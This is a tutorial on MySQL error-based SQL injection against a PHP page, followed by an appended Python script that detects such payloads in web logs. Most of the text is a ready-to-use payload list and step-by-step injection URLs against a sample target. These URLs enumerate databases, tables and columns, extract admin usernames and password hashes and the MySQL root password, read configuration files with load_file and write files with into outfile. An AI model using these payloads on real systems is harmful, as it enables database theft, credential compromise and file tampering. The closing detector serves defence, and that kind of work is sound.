When MySQL executes a SQL statement that contains an error, it returns an error message. When MySQL is used together with PHP, that error message is not displayed on the page by default.
To show it in PHP, call mysql_error() when executing the statement; only then is the error message printed to the page:
$result = mysql_query("select * from article where id=$id") or die(mysql_error());
1. Some error-generating statements
1. Triggering an error with floor
/* database version */
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/* simple way to dump databases */
/* connected user */
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/* connected database */
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/* dump databases */
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/* dump tables */
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/* dump columns */
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/* dump contents */
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Example:
Current user name
http://target_sys.com/mysqlinj.php?id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
root password
http://target_sys.com/mysqlinj.php?id=1 and (extractvalue(1,concat(0x7e,(select password from mysql.user),0x7e)))
Query databases
http://target_sys.com/mysqlinj.php?id=-1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Query the second database
http://target_sys.com/mysqlinj.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Keep incrementing the 1 in the part "FROM information_schema.schemata LIMIT 1,1" to obtain the names of all databases.
target_sys
Query tables
http://target_sys.com/mysqlinj.php?id=-1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Second table
http://target_sys.com/mysqlinj.php?id=-1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Query columns
To query the admin table, first convert "admin" to hexadecimal, then put it into the statement.
http://target_sys.com/mysqlinj.php?id=-1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Query the second column: advance the 0 in "0x61646D696E LIMIT 0,1".
http://target_sys.com/mysqlinj.php?id=-1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Query data
http://target_sys.com/mysqlinj.php?id=-1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Sometimes this method does not work; use the one below instead.
Querying data with updatexml
http://target_sys.com/mysqlinj.php?id=-1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)
This kind of query returns only 32 characters, so part of the value cannot be retrieved. You can first query the ciphertext, or first query its length, and then extract it piece by piece by character position.
http://target_sys.com/mysqlinj.php?id=-1 and updatexml(1,concat(0x7e,(SELECT distinct LENGTH(concat(0x23,username,0x3a,password,0x23)) FROM admin limit 0,1),0x7e),1)
The LENGTH function reports a length of 40.
SUBSTRING(): string extraction function
Query characters 1-32
http://target_sys.com/mysqlinj.php?id=-1 and updatexml(1,concat(0x7e,(SELECT distinct SUBSTRING(concat(0x23,username,0x3a,password,0x23),1,32) FROM admin limit 0,1),0x7e),1)
admin:e10adc3949ba59abbe56e057
Query characters 32-40
http://target_sys.com/mysqlinj.php?id=-1 and updatexml(1,concat(0x7e,(SELECT distinct SUBSTRING(concat(0x23,username,0x3a,password,0x23),33,40) FROM admin limit 0,1),0x7e),1)
f20f883e
Then concatenate the two strings to obtain the complete data:
admin:e10adc3949ba59abbe56e057f20f883e
Reading and writing files through errors
Reading a file with extractvalue
http://target_sys.com/mysqlinj.php?id=-1 and (extractvalue(1,concat(0x7e,(select load_file('C:\inetpub\wwwroot\target_sys.com\data\config.inc.php')),0x7e)))
The following method is preferable since it returns more content; the method above reads only 32 characters of the file.
Reading with the exp method
http://target_sys.com/mysqlinj.php?id=1 and (exp(~(select*from(select load_file('C:\inetpub\wwwroot\target_sys.com\data\config.inc.php'))a)));
Writing a file
http://target_sys.com/mysqlinj.php?id=-1 and exp(~(select*from(select 'hello')a)) into outfile 'C:\inetpub\wwwroot\target_sys.com\data\config.inc.txt';
By default, this file write can only write a 0 into the file.
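As an added, defender-side example (not part of the original page), the following Python script shows how the payload shapes listed above can be spotted in web-server access logs, and how an error page returned by an application that uses "or die(mysql_error())" can be checked for query results echoed back inside the MySQL error text. The signature names, the regular expressions, the sample log lines and the sample error body are all constructed for this example and should be tuned for real traffic.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures for the MySQL error-based techniques discussed on the
# page (floor/rand/group by, extractvalue, updatexml, exp overflow, file I/O).
# These patterns are constructed for this example; tune them for real traffic.
REQUEST_SIGNATURES = {
    "floor-rand-groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)[\s\S]*?group\s+by", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "exp-overflow": re.compile(r"\bexp\s*\(\s*~", re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "into-outfile": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
}

# Response-side: MySQL error texts that echo a string taken from the query. If
# one of these reaches a client, the application leaks query results via errors.
RESPONSE_LEAKS = [
    re.compile(r"XPATH syntax error: '([^']*)'"),
    re.compile(r"Duplicate entry '([^']*)' for key"),
    re.compile(r"DOUBLE value is out of range in '([^']*)'"),
]

# Combined access-log line: ip - - [time] "METHOD path HTTP/x" status bytes
LOG_LINE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def decode_url(url: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads are still inspected."""
    for _ in range(rounds):
        decoded = unquote_plus(url)
        if decoded == url:
            break
        url = decoded
    return url


def classify_request(url: str) -> list:
    """Return the sorted names of all signatures matching the decoded request URL."""
    decoded = decode_url(url)
    return sorted(name for name, rx in REQUEST_SIGNATURES.items() if rx.search(decoded))


def leaked_from_error(body: str):
    """Return the string echoed inside a MySQL error message, or None if none is present."""
    for rx in RESPONSE_LEAKS:
        m = rx.search(body)
        if m:
            return m.group(1)
    return None


def scan_access_log(lines) -> list:
    """Return one finding per log line whose request matches at least one signature."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, path, status = m.group(1), m.group(2), int(m.group(3))
        tags = classify_request(path)
        if tags:
            findings.append({"ip": ip, "path": path, "status": status, "tags": tags})
    return findings


# Constructed sample log (not real traffic): one benign request and two requests
# carrying URL-encoded forms of the updatexml and floor/rand payloads from the page.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /mysqlinj.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /mysqlinj.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20user()),0x7e),1) HTTP/1.1" 500 233',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /mysqlinj.php?id=-1%20and(select%201%20from(select%20count(*),concat((select%20version()),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 241',
]

# Constructed error body, as a PHP page using "or die(mysql_error())" would emit it.
SAMPLE_ERROR_BODY = "XPATH syntax error: '~root@localhost~'"

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["ip"], f["status"], f["tags"])
    print("leaked:", leaked_from_error(SAMPLE_ERROR_BODY))
```

The request-side check is what a WAF rule or a log-review job would do; the response-side check is what you would run against the application's own output to confirm whether the "or die(mysql_error())" pattern from the top of the page is exposing query results to clients.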
